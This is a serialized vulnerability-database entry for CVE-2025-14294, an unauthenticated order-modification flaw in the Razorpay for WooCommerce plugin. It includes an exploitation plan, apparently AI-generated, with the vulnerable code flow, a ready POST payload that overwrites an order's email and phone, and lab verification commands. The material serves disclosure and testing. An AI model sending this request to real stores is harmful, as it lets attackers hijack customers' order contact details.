[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fUPOA6ESAxsJtH3RwWqRoycSaswP-p1FaAclEpA5kC9c":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":29,"research_verified":30,"research_rounds_completed":31,"research_plan":32,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":33,"research_started_at":34,"research_completed_at":35,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":30,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":30,"source_links":36},"CVE-2025-14294","razorpay-for-woocommerce-missing-authentication-to-unauthenticated-order-modification","Razorpay for WooCommerce \u003C= 4.7.8 - Missing Authentication to Unauthenticated Order Modification","The Razorpay for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the getCouponList() function in all versions up to, and including, 4.7.8. This is due to the checkAuthCredentials() permission callback always returning true, providing no actual authentication. This makes it possible for unauthenticated attackers to modify the billing and shipping contact information (email and phone) of any WooCommerce order by knowing or guessing the order ID.","woo-razorpay",null,"\u003C=4.7.8","4.7.9","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authentication for Critical Function","2026-02-18 00:00:00","2026-02-19 04:36:07",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F163d42df-148f-431c-891e-dbdc09bf2ae1?source=api-prod",1,[22,23,24,25,26,27,28],"includes\u002Fapi\u002Fapi.php","includes\u002Fapi\u002Fauth.php","includes\u002Fapi\u002Fcart.php","includes\u002Fapi\u002Fcoupon-apply.php","includes\u002Fapi\u002Fcoupon-get.php","includes\u002Frazorpay-webhook.php","readme.txt","researched",false,3,"# Exploitation Research Plan: CVE-2025-14294\n\n## 1. Vulnerability Summary\nThe **Razorpay for WooCommerce** plugin (up to version 4.7.8) contains a missing authentication vulnerability in its custom REST API implementation. The plugin registers several endpoints for its \"Magic Checkout\" (1cc) feature. One specific endpoint, `1cc\u002Fv1\u002Fcoupon\u002Flist`, uses a permission callback that unconditionally returns `true`. This allows unauthenticated attackers to invoke the `getCouponList` function, which incorrectly performs data modification (updating order billing\u002Fshipping info) before returning the requested coupon data.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `POST \u002Fwp-json\u002F1cc\u002Fv1\u002Fcoupon\u002Flist`\n- **Vulnerable Parameter(s):** \n    - `order_id`: The WooCommerce Order ID to target.\n    - `email`: The new email address to set on the order.\n    - `contact`: The new phone number to set on the order.\n- **Authentication Level:** Unauthenticated (Public).\n- **Preconditions:** \n    - The plugin \"Razorpay for WooCommerce\" must be active.\n    - An existing WooCommerce order ID must be known or guessed (order IDs are typically sequential integers).\n\n## 3. Code Flow\n1.  **Route Registration:** In `includes\u002Fapi\u002Fapi.php`, the function `rzp1ccInitRestApi()` registers the route:\n    ```php\n    register_rest_route(\n        RZP_1CC_ROUTES_BASE . '\u002Fcoupon', \u002F\u002F '1cc\u002Fv1\u002Fcoupon'\n        'list',\n        array(\n            'methods'             => 'POST',\n            'callback'            => 'getCouponList',\n            'permission_callback' => 'checkAuthCredentials',\n        )\n    );\n    ```\n2.  **Auth Bypass:** The `permission_callback` points to `checkAuthCredentials()` in `includes\u002Fapi\u002Fauth.php`, which simply returns `true`:\n    ```php\n    function checkAuthCredentials() {\n        return true;\n    }\n    ```\n3.  **Data Modification Sink:** The callback `getCouponList` in `includes\u002Fapi\u002Fcoupon-get.php` processes the request:\n    - It retrieves `order_id`, `email`, and `contact` from the request parameters.\n    - It fetches the order using `wc_get_order($orderId)`.\n    - If an `email` is provided, it updates `_billing_email` and `_shipping_email` using either `update_meta_data` (for High-Performance Order Storage\u002FHPOS) or `update_post_meta`.\n    - If a `contact` is provided, it updates `_billing_phone` and `_shipping_phone` similarly.\n    - All of this occurs before any coupon logic or validation beyond checking if the order exists.\n\n## 4. Nonce Acquisition Strategy\nThis specific vulnerability **does not require a WordPress nonce**. \n- The REST API endpoint is registered with a `permission_callback` that returns `true`.\n- Standard WordPress REST API nonce requirements (`_wpnonce` or `X-WP-Nonce`) are enforced only for authenticated sessions to prevent CSRF. For unauthenticated routes explicitly allowing public access, WordPress does not require a nonce.\n- Inspection of `getCouponList` in `includes\u002Fapi\u002Fcoupon-get.php` confirms there are no manual nonce verification calls (e.g., `wp_verify_nonce`).\n\n## 5. Exploitation Strategy\nThe goal is to modify the contact details of an existing order.\n\n### Step-by-Step Plan:\n1.  **Identify Target:** Determine a valid WooCommerce Order ID (e.g., `123`).\n2.  **Craft Payload:** Create a JSON or URL-encoded payload containing the target `order_id` and the malicious `email`\u002F`contact` values.\n3.  **Execute Request:** Send a POST request to the REST endpoint.\n\n### HTTP Request (using `http_request` tool):\n- **Method:** `POST`\n- **URL:** `http:\u002F\u002F\u003Ctarget-site>\u002Fwp-json\u002F1cc\u002Fv1\u002Fcoupon\u002Flist`\n- **Headers:** \n    - `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body:** `order_id=123&email=attacker@evil.com&contact=9999999999`\n\n## 6. Test Data Setup\nTo verify the exploit in the test environment:\n1.  **Install WooCommerce:** Ensure WooCommerce is active.\n2.  **Create a Product:** `wp post create --post_type=product --post_title=\"Test Product\" --post_status=publish`\n3.  **Create an Order:** \n    - Use WP-CLI to create an order: `wp wc shop_order create --user=1 --customer_id=1 --billing='{\"email\":\"original@example.com\",\"phone\":\"1234567890\"}'`\n    - Note the returned ID (e.g., `123`).\n4.  **Confirm Original State:** `wp post meta get 123 _billing_email`\n\n## 7. Expected Results\n- **Success Indicator:** The server returns a `200 OK` (or potentially a `400` if coupon logic fails later, but after the metadata update). The response body will likely be a JSON object containing coupon data or an empty list.\n- **Data Change:** The `_billing_email`, `_shipping_email`, `_billing_phone`, and `_shipping_phone` meta values for the target order ID will be updated to the values provided in the exploit.\n\n## 8. Verification Steps\nAfter executing the HTTP request, run the following WP-CLI commands to confirm the injection:\n1.  **Check Email:** `wp post meta get \u003CORDER_ID> _billing_email`\n    - *Expected:* `attacker@evil.com`\n2.  **Check Phone:** `wp post meta get \u003CORDER_ID> _billing_phone`\n    - *Expected:* `9999999999`\n3.  **Check Shipping Info:** `wp post meta get \u003CORDER_ID> _shipping_email`\n    - *Expected:* `attacker@evil.com`\n\n## 9. Alternative Approaches\nIf the `1cc\u002Fv1\u002Fcoupon\u002Flist` endpoint fails for some reason (e.g., environment-specific constraints on the query), other endpoints in `api.php` also use `checkAuthCredentials` and might have similar logic:\n- `1cc\u002Fv1\u002Fcoupon\u002Fapply` (`applyCouponOnCart`): Uses `order_id` and `email` and calls `initCustomerSessionAndCart()`.\n- `1cc\u002Fv1\u002Fcod\u002Forder\u002Fprepay` (`prepayCODOrder`): Processes order information.\n\nHowever, `getCouponList` is the most direct path as the modification logic is explicitly present in the source for that function. Reachable via:\n`includes\u002Fapi\u002Fcoupon-get.php` lines 47-66.","gemini-3-flash-preview","2026-04-19 04:51:54","2026-04-19 04:52:21",{"type":37,"vulnerable_version":38,"fixed_version":11,"vulnerable_browse":39,"vulnerable_zip":40,"fixed_browse":41,"fixed_zip":42,"all_tags":43},"plugin","4.7.8","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoo-razorpay\u002Ftags\u002F4.7.8","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwoo-razorpay.4.7.8.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoo-razorpay\u002Ftags\u002F4.7.9","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwoo-razorpay.4.7.9.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoo-razorpay\u002Ftags"]